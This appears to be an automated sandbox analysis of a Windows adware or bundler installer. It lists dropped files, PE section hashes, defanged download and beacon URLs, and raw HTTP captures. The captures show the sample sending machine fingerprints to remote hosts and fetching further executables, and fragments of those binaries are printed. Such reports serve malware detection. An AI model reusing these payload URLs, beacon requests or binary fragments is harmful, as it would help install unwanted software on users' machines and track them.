%Documents and Settings%\%current user%\Local Settings\Temp\{B45A900F-0CB7-44A9-89C2-F36A56D5F94E} (653285 bytes)
%Program Files%\Coabuied\Atidogrudck.7z2 (169 bytes)
%WinDir%\Tasks\Chocosyledusy Update.job (5526 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 392593 | 392704 | 4.42083 | c54970e43ae7fb6d349b77b46bf40c0e |
| .rdata | 397312 | 288548 | 288768 | 2.55493 | db03ac8b0697ccb16a7696afcf5a8b9f |
| .data | 688128 | 16388 | 7168 | 2.73465 | 7e82085e8f6d98eebe8373d48637ed99 |
| .rsrc | 708608 | 448 | 512 | 3.51688 | d54acb5766f1897023ceb9a53d618b13 |
| .reloc | 712704 | 29172 | 29184 | 3.74339 | eba389e2322dcf3c752080980a0fc413 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/index.php | |
| hxxp://dyno3mlj15jgv.cloudfront.net/V38/amipb.js | |
| hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/namen.php | |
| hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/tdownload1.php | |
| hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/finalize.php | |
| hxxp://d3tufnia3qwp0y.cloudfront.net/main/tmnqck.exe | 54.192.98.62 |
| hxxp://cds.j6b5e5z4.hwcdn.net/nop.exe | 205.185.216.10 |
| hxxp://d2jeaw7c5nmwo6.cloudfront.net/upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, | 54.192.98.18 |
| hxxp://d2jeaw7c5nmwo6.cloudfront.net/gkozn0k4?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, | 54.192.98.18 |
| hxxp://d2jeaw7c5nmwo6.cloudfront.net/te610ket?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, | 54.192.98.18 |
| hxxp://d2jeaw7c5nmwo6.cloudfront.net/upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&a=visit.dl.winmain.prestart4.54359f8ab1edeba9bf9f1f54346ec7d8.0 | 54.192.98.18 |
| hxxp://d2jeaw7c5nmwo6.cloudfront.net/xl8bs23q?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, | 54.192.98.18 |
| hxxp://d2jeaw7c5nmwo6.cloudfront.net/te610ket?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&a=visit.dl.winmain.prestart4.54359f8ab1edeba9bf9f1f54346ec7d8.0 | 54.192.98.18 |
| hxxp://d2jeaw7c5nmwo6.cloudfront.net/upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&a=visit.dl.winmain.start.100 | 54.192.98.18 |
| hxxp://d2jeaw7c5nmwo6.cloudfront.net/te610ket?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&a=visit.dl.winmain.start.100 | 54.192.98.18 |
| hxxp://d3dzwo5vzf4g44.cloudfront.net/i2/84 | 54.192.98.247 |
| hxxp://d2umj5io7dy7ns.cloudfront.net/r6/84_5187e131bbe97c8dcab0db3e43d5a54b/1.n.txt | 54.192.98.172 |
| hxxp://d3dzwo5vzf4g44.cloudfront.net/s2/1468885288/84 | 54.192.98.247 |
| hxxp://d2jeaw7c5nmwo6.cloudfront.net/gkozn0k4?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=searchurl,hohosearch | 54.192.98.18 |
| hxxp://d2jeaw7c5nmwo6.cloudfront.net/upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=searchurl,hohosearch | 54.192.98.18 |
| hxxp://www.continuumdownload.com/index.php | 54.225.238.18 |
| hxxp://www.continuumdownload.com/namen.php | 54.225.238.18 |
| hxxp://cdn1.downloadaxel.com/V38/amipb.js | 54.192.98.230 |
| hxxp://www.continuumdownload.com/finalize.php | 54.225.238.18 |
| hxxp://www.downloadaxel.com/tdownload1.php | 54.225.137.51 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.continuumdownload.com
Content-Length: 590
Connection: Keep-Alive
Cache-Control: no-cache
Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=B3920CF566AB717F84CE9CE32F62B904&Sysid1=B3920CF566AB717F84CE9CE32F62B904&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&ci=10235&cmdl=amisetup7548__10235_il2.exe /s /ver 1.1.2.41 /t /i NationZoom /u http://VVV.continuumdownload.com/index.php /ci 10235&dprod=19C2FB3DEC385401F6FCF22178334A&exe=amisetup7548__10235_il2&ffver=&i=NationZoom&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA==&name=WFAzAA==&netfs=3&s=Y&tmode=1&ts=1468885270&ver=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Jul 2016 23:41:09 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
4d9....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> . <title>nop</title>...<script type="text/javascript">... var g_notCompatibleWithUpdaterComps = ['LootFindKP'];... var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDuba', 'UCwebAccelerator', 'UltimateSecurityPackage' , 'TotalSecurity', 'TotalSecurityIN', 'TotalSecurityRU'];...</script> . <base href="hXXp://VVV.continuumdownload.com:80/index.php" />. <script type="text/javascript" src="hXXp://cdn1.downloadaxel.com/V38/amipb.js"></script>. <script type="text/javascript">.var g_r__capp="nop";.. var g_amiobj = '', g_ami, g_updb = false, g_close = '0', g_additional_offer_list = '0';. var g_finish_install_button = '0';. var g_popup_install_all = '0';. var g_eula = '';. var g_post1 = '_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=10235&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c485&_instid=l2&_brw=ie&_fc=1289&_appname=&_appimageurl=&_netfs=-31&_vert=3';. var g_icon = '';. var g_comps = [], g_pages = [], c, g_curPage = -1;. var g_cid = '1..288c..0235';. var g_tid = '';. var g_cc = 'UA';. var g_lang = 'en';. var g_ip = '194.242.96.226';. var g_browser = 'ie';. var g_cnt = '43db927915f3640d106
<<< skipped >>>
GET /V38/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.continuumdownload.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Thu, 30 Jun 2016 11:47:44 GMT
If-None-Match: "ecff2ed06ac9c71e23853f0e7bd249e0"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn1.downloadaxel.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Connection: keep-alive
Date: Mon, 18 Jul 2016 23:41:22 GMT
ETag: "ecff2ed06ac9c71e23853f0e7bd249e0"
x-amz-storage-class: REDUCED_REDUNDANCY
Server: AmazonS3
Age: 42468
X-Cache: Hit from cloudfront
Via: 1.1 795b65ff0c55e70d8791f9def508f3a8.cloudfront.net (CloudFront)
X-Amz-Cf-Id: A0D4LEmVV3R2Ua2mdWdAyDd-FBpcXHgmojtyoLpVBmhhdQcFiUcIbg==
HTTP/1.1 304 Not Modified..Connection: keep-alive..Date: Mon, 18 Jul 2016 23:41:22 GMT..ETag: "ecff2ed06ac9c71e23853f0e7bd249e0"..x-amz-storage-class: REDUCED_REDUNDANCY..Server: AmazonS3..Age: 42468..X-Cache: Hit from cloudfront..Via: 1.1 795b65ff0c55e70d8791f9def508f3a8.cloudfront.net (CloudFront)..X-Amz-Cf-Id: A0D4LEmVV3R2Ua2mdWdAyDd-FBpcXHgmojtyoLpVBmhhdQcFiUcIbg==..
GET /r6/84_5187e131bbe97c8dcab0db3e43d5a54b/1.n.txt HTTP/1.1
Accept: */*
Connection: Keep-Alive
Cache-Control: no-cache
Host: d2umj5io7dy7ns.cloudfront.net
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 1520528
Connection: keep-alive
Date: Mon, 18 Jul 2016 11:10:38 GMT
Last-Modified: Mon, 18 Jul 2016 11:05:01 GMT
ETag: "f5b50d11ed03664f4ce0d53699b7dcd0"
x-amz-storage-class: REDUCED_REDUNDANCY
x-amz-meta-content-md5: f5b50d11ed03664f4ce0d53699b7dcd0
Accept-Ranges: bytes
Server: AmazonS3
Age: 45052
X-Cache: Hit from cloudfront
Via: 1.1 ff7053cb54d39315806cac9d50632264.cloudfront.net (CloudFront)
X-Amz-Cf-Id: jOvT85j2LEEZkhz9gucvQ8_dtBPKNtTyY9EAk3cCKH6EznpcJAEayg==
.....W69..M....v._9s.`..|.O....2.. a#v.......7...cU0h. ....K..y......s.[...|18..!)q..i..l.Q..s..... .....;...Fh~...#.%.f......b{.......Q..x....,.....9.\x~...n....Qo..9f.....N......(.}....z.`.#?5...il..Y..=.n..<...!..~..y...O.U.\T.T..C....................p........(za.:N}{...4%Bje..W%....k.M.Q...b.2F....`.sM.Ftq..z.z...DS.?...$...X2.e.F..bh...../...dd_Z.3'qL.......... .yX....`_a....Z..h#Aj...gtWo...i...x\..Z..J:oo}P..4 .Qu..-....b$..R..C..].Q...e0.......Mz...n.!3..-J0...$.-ao......4$........t=...U.`.....<".G...,...'E6yl..N/..P...=.PZ.. .*.@.T........m?..O.9...%.).........].R...K.VI.Y...R......].:."&.9H...h.O.....v..f/..I....nn...1...v.]C;3...Hg............}Y.?7....6.......2f..r.<.#r.....{.......5N...\.......f..xP......A....2...@.$.t...:......b/.$....p.r.;.k....B..2...&.dE,..,Rb.<~....<..B*.&(.~..k....{Ao.&=..'.wcx.\.0>...o=..?.. 3(......O...b.M.2..2EH......p..&,.iBCv..t#...6....(.',.....t.{..."..l...xu..f..&r7.G.0P.jmjj.q..e>x...QdU....V_..IdN.9...le..H.$..W..TKI_.c.....Se.D.....&..B...Nkq..bQ..Xp9.e..E..@..F..5.....P........E...K8o.|...9.6...K.#....1.....[...j.r...%..5*....&.B...M.k(.#S...".{.\5P........{A.(2E.`1|.d.~..f.. .[...(..uL.<o`.m0_=R5.5..K..Pm..`.............*\?..H......r.AQ'{R3..........FS#J.Ha"..t#?}V:!..].\F/.y.....qac.b"#...i..#.x*......0PT.n........o`......n~.2;Z.....G.36..~%......2i..d..O.]I.w..G....(&=.. $.A...)pW.....V.]...'f. .P$..5..ha|v.....9:&~@..oRQ...&..IO....H.ezn....d.. .....d.Y... ..........d....sl\....0=.Ld..UV.[)....Z....^..L'1..T$E........ ....(....y.....S.~G
<<< skipped >>>
POST /i2/84 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: d3dzwo5vzf4g44.cloudfront.net
Content-Length: 153
Cache-Control: no-cache
data=bWFjdj01LjEmcHRpZD1hbXomdWlkPVZNd2FyZVhWaXJ0dWFsWElERVhIYXJkWERyaXZlXzAwMDAwMDAwMDAwMDAwMDAwMDAxJnNtZDU9NTQzNTlmOGFiMWVkZWJhOWJmOWYxZjU0MzQ2ZWM3ZDg=
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:29 GMT
X-Powered-By: PHP/5.5.30
ut: 1468885289
Location: hXXp://d2umj5io7dy7ns.cloudfront.net/r6/84_5187e131bbe97c8dcab0db3e43d5a54b/1.n.txt
X-Cache: Miss from cloudfront
Via: 1.1 6296292885688507e00160ec3af83700.cloudfront.net (CloudFront)
X-Amz-Cf-Id: FtMgeqK5wsDvVP8ntH79sjf5n1pvdKyArI307k00iiZJLJ_x9QB7SA==
0..HTTP/1.1 302 Moved Temporarily..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Server: nginx/1.8.0..Date: Mon, 18 Jul 2016 23:41:29 GMT..X-Powered-By: PHP/5.5.30..ut: 1468885289..Location: hXXp://d2umj5io7dy7ns.cloudfront.net/r6/84_5187e131bbe97c8dcab0db3e43d5a54b/1.n.txt..X-Cache: Miss from cloudfront..Via: 1.1 6296292885688507e00160ec3af83700.cloudfront.net (CloudFront)..X-Amz-Cf-Id: FtMgeqK5wsDvVP8ntH79sjf5n1pvdKyArI307k00iiZJLJ_x9QB7SA==..0......
POST /s2/1468885288/84 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: d3dzwo5vzf4g44.cloudfront.net
Content-Length: 92
Cache-Control: no-cache
uid=ADCA2197E17DE989DA91F56322BE0AB0&uide=VMwareXVirtualXIDEXHardXDrive_00000000000000000001
HTTP/1.1 200 OK
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:37 GMT
X-Powered-By: PHP/5.5.30
X-Cache: Miss from cloudfront
Via: 1.1 6296292885688507e00160ec3af83700.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 0c67l8DetnobZftW6Dy_ntjN7xDBjODKLWWG6mYqfiqeYa5uL9Wlqg==
0..HTTP/1.1 200 OK..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Server: nginx/1.8.0..Date: Mon, 18 Jul 2016 23:41:37 GMT..X-Powered-By: PHP/5.5.30..X-Cache: Miss from cloudfront..Via: 1.1 6296292885688507e00160ec3af83700.cloudfront.net (CloudFront)..X-Amz-Cf-Id: 0c67l8DetnobZftW6Dy_ntjN7xDBjODKLWWG6mYqfiqeYa5uL9Wlqg==..0..
GET /nop.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cds.j6b5e5z4.hwcdn.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 18 Jul 2016 23:41:23 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1450621105"
Cache-Control: max-age=30752
Content-Length: 37172
Content-Type: application/octet-stream
X-HW: 1468885283.dop010.fr7.t,1468885283.cds057.fr7.c
Last-Modified: Sun, 20 Dec 2015 14:18:25 GMT
Content-Disposition: attachment; filename="nop.exe"
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...d..K.................d..........^5............@..................................................................................................................................................................................................text....c.......d.................. ..`.rdata...............h..............@..@.data....p...........|..............@....ndata....... ...........................rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H......C..H.P.u..u..u...T.@..B...SV.5..C..E.WP.u...X.@..e...E..E.P.u...\.@..}..e....D.@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h..C.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$....C...Si.....VW.T.....tO.q.3.;5..C.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..C.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
POST /i2/84 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: d3dzwo5vzf4g44.cloudfront.net
Content-Length: 153
Cache-Control: no-cache
data=bWFjdj01LjEmcHRpZD1hbXomdWlkPVZNd2FyZVhWaXJ0dWFsWElERVhIYXJkWERyaXZlXzAwMDAwMDAwMDAwMDAwMDAwMDAxJnNtZDU9NTQzNTlmOGFiMWVkZWJhOWJmOWYxZjU0MzQ2ZWM3ZDg=
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:28 GMT
X-Powered-By: PHP/5.5.30
ut: 1468885288
Location: hXXp://d2umj5io7dy7ns.cloudfront.net/r6/84_5187e131bbe97c8dcab0db3e43d5a54b/1.n.txt
X-Cache: Miss from cloudfront
Via: 1.1 3fe626ff9b8e73cd85a4a1e019abf439.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 9FfP_j22JGVzR-jF_czRlzRi8YG47xMoLPcCAPhgdxbosinj-Q01rg==
0..HTTP/1.1 302 Moved Temporarily..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Server: nginx/1.8.0..Date: Mon, 18 Jul 2016 23:41:28 GMT..X-Powered-By: PHP/5.5.30..ut: 1468885288..Location: hXXp://d2umj5io7dy7ns.cloudfront.net/r6/84_5187e131bbe97c8dcab0db3e43d5a54b/1.n.txt..X-Cache: Miss from cloudfront..Via: 1.1 3fe626ff9b8e73cd85a4a1e019abf439.cloudfront.net (CloudFront)..X-Amz-Cf-Id: 9FfP_j22JGVzR-jF_czRlzRi8YG47xMoLPcCAPhgdxbosinj-Q01rg==..0..
GET /te610ket?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, HTTP/1.1
Host: d2jeaw7c5nmwo6.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:27 GMT
X-Cache: Miss from cloudfront
Via: 1.1 954e53c2911d47d729ae27754b6408a8.cloudfront.net (CloudFront)
X-Amz-Cf-Id: eYPZAmHB4KUxXfv3ak-IIFv1XlKzLDJtq4k88gBhqrqVqNveMAJ0-w==
....
GET /xl8bs23q?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, HTTP/1.1
Host: d2jeaw7c5nmwo6.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:27 GMT
X-Cache: Miss from cloudfront
Via: 1.1 954e53c2911d47d729ae27754b6408a8.cloudfront.net (CloudFront)
X-Amz-Cf-Id: TWBFtaJOhMHAzII90MPVcXTQkkVu3N81nMN3_RE_Kw944-ikKgzn3w==
....
GET /upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&a=visit.dl.winmain.start.100 HTTP/1.1
Host: d2jeaw7c5nmwo6.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:27 GMT
X-Cache: Miss from cloudfront
Via: 1.1 954e53c2911d47d729ae27754b6408a8.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 6uzf9wBjIvF-tU7OpDqcYpIb8h4ZPMpxP0AddFqaVji94qw8NiY4iA==
HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Server: nginx/1.8.0..Date: Mon, 18 Jul 2016 23:41:27 GMT..X-Cache: Miss from cloudfront..Via: 1.1 954e53c2911d47d729ae27754b6408a8.cloudfront.net (CloudFront)..X-Amz-Cf-Id: 6uzf9wBjIvF-tU7OpDqcYpIb8h4ZPMpxP0AddFqaVji94qw8NiY4iA==......
GET /gkozn0k4?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=searchurl,hohosearch HTTP/1.1
Host: d2jeaw7c5nmwo6.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Server: n
POST /namen.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.continuumdownload.com
Content-Length: 62
Connection: Keep-Alive
campid=99999&i=NationZoom&prefix=amisetup7604&version=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Mon, 18 Jul 2016 23:41:16 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 177
Connection: keep-alive
[Data]..exe=amisetup7604.exe..url=hXXp://VVV.downloadaxel.com/tdownload1.php..params=version=1.1.2.41&s1=40892244b230be839cbf3368d291c6a3b5efe967&t1=1468885456&campid=99999&z2=0HTTP/1.1 200 OK..Content-Type: text/plain; charset=UTF-8..Date: Mon, 18 Jul 2016 23:41:16 GMT..Server: Apache/2.2.15 (Red Hat)..X-Powered-By: PHP/5.3.3..Content-Length: 177..Connection: keep-alive..[Data]..exe=amisetup7604.exe..url=hXXp://VVV.downloadaxel.com/tdownload1.php..params=version=1.1.2.41&s1=40892244b230be839cbf3368d291c6a3b5efe967&t1=1468885456&campid=99999&z2=0..
POST /tdownload1.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.downloadaxel.com
Content-Length: 112
Connection: Keep-Alive
version=1.1.2.41&s1=40892244b230be839cbf3368d291c6a3b5efe967&t1=1468885456&campid=99999&z2=0&prefix=amisetup7604
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Content-Disposition: attachment; filename="amisetup7604__99999_il2.exe"
Content-Type: application/x-msdownload
Date: Mon, 18 Jul 2016 23:41:16 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: amisetup7604__99999_il2.exe
Content-Length: 812256
Connection: keep-alive
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B...#j..#j..#j.6....#j.Y....#j.Y....#j.Y...)#j..U...#j..[...#j..[...#j..#k..#j......#j......#j......#j..#...#j......#j.Rich.#j.................PE..L...qa.W.................L..........`u.......`....@.......................................@.....................................(....@..`............L.......@......................................P...@............`...............................text...&K.......L.................. ..`.rdata..7....`.......P..............@..@.data....C.......$..................@....rsrc...`....@......................@..@.reloc...L...@...N..................@..B................................................................................................................................................................................................................................................................................................................RQ.I\.......................................@....."B............................U...E.].........VW..W..j.V..e.......>_^.........U...U..M.......1..3......]......U...E....E..A..A.......]........U..V..W.N...t..}........._..^]....F...t.P......}....7......_..^]..._2.^]........U...E.V..~..@.......u.f......B........^]........U...u........t..u....g...]...2.]................U..Q.u........t..u....u......Y]...2.Y]..........V.........^.....3..........u....w.....F.........j.j.j.h.......`A................U...E.....]..
<<< skipped >>>
GET /V38/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.continuumdownload.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn1.downloadaxel.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 72267
Connection: keep-alive
Date: Thu, 30 Jun 2016 11:52:08 GMT
Last-Modified: Thu, 30 Jun 2016 11:47:44 GMT
ETag: "ecff2ed06ac9c71e23853f0e7bd249e0"
x-amz-storage-class: REDUCED_REDUNDANCY
Accept-Ranges: bytes
Server: AmazonS3
Age: 42457
X-Cache: Hit from cloudfront
Via: 1.1 3fe626ff9b8e73cd85a4a1e019abf439.cloudfront.net (CloudFront)
X-Amz-Cf-Id: agrapGOeVDGt4U0rmB8vT8UhDmQTAvNVN0l_eWkUNLn6qmSEg4SW9A==
..//<!-- ../* Progress bar */..var g_AmiPbs = new Array();.var g_AmiPbsEx = new Array();.var g_interval = 0;.var g_initComp = 0;.var g_possibleComps = [];.var g_reportedComps = [];.var g_removedComps = [];..var g_disable_updater = false;..//in the version we tests updater task is created firstly.var g_UpdaterTestVersion = (typeof (g_ver) !== 'undefined' && g_ver != null && g_ver == '1.1.5.90');.var g_UpdaterTaskCreated = false;..function LogMessage(message) {. try {. g_ami.Log(message);. }. catch (excpt) {. }.}..function IsDeclined(name) {. var declined = 0;. for (var i = 0; i < g_removedComps.length; i ) {. if (g_removedComps[i] == name) {. declined = 1;. break;. }. }. return declined;.}..function UpdateSkipStatus(sn) {. if (g_testa && !ArrayContains(g_reportedComps, sn) && !ArrayContains(g_notest, sn) && !ArrayContains(g_notest1, sn) && !ArrayContains(g_notest2, sn)) {. if (g_testa.constructor != Array || ArrayContains(g_testa, sn)) {. g_ami.WriteProfileString(g_testf, '', sn, 'S');. g_reportedComps.push(sn);. }. }.}..function ShortNameFromName(name) {. for (c = 0; c < g_comps.length; c ) {. if (g_comps[c].name == name) {. return g_comps[c].sn;. }. }. return name;.}..function UpdateComponentsStatus() {. LogMessage('UpdateComponentsStatus function started');. for (var j = 0; j < g_possibleComps.length; j ) {.. if (g_possibleComps[j].sn =
<<< skipped >>>
GET /upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, HTTP/1.1
Host: d2jeaw7c5nmwo6.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:27 GMT
X-Cache: Miss from cloudfront
Via: 1.1 38133ea2296a83bfacba51a6f2abd5a6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: YayF0mq1SNybD_LGuqw18qCrLsqQLpCy5ij5ZS-GKvlxebYfSZF8cA==
....
GET /gkozn0k4?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, HTTP/1.1
Host: d2jeaw7c5nmwo6.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:27 GMT
X-Cache: Miss from cloudfront
Via: 1.1 38133ea2296a83bfacba51a6f2abd5a6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: DoS3_zHXN6RMj1QuqUibMrDmlK4Jp-kC4g2YN8tEOt1nSq1K7_DJMw==
....
GET /upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&a=visit.dl.winmain.prestart4.54359f8ab1edeba9bf9f1f54346ec7d8.0 HTTP/1.1
Host: d2jeaw7c5nmwo6.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:27 GMT
X-Cache: Miss from cloudfront
Via: 1.1 38133ea2296a83bfacba51a6f2abd5a6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fy58qKstRrZCUhYrjgymjh8hsFXdkTeIygmpY_Gk39A-pVuhiKoDgg==
....
GET /te610ket?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&a=visit.dl.winmain.prestart4.54359f8ab1edeba9bf9f1f54346ec7d8.0 HTTP/1.1
Host: d2jeaw7c5nmwo6.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:27 GMT
X-Cache: Miss from cloudfront
Via: 1.1 38133ea2296a83bfacba51a6f2abd5a6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: XCLWWYd_JCwUieChtQrhT0Dj2BiD3LR0uoQaa5anG2DLHF1jknUTbQ==
....
GET /te610ket?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&a=visit.dl.winmain.start.100 HTTP/1.1
Host: d2jeaw7c5nmwo6.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Server: nginx/1.8.0
Date: Mon, 18 Jul 2016 23:41:27 GMT
X-Cache: Miss from cloudfront
Via: 1.1 38133ea2296a83bfacba51a6f2abd5a6.cloudfront.net (CloudFront)
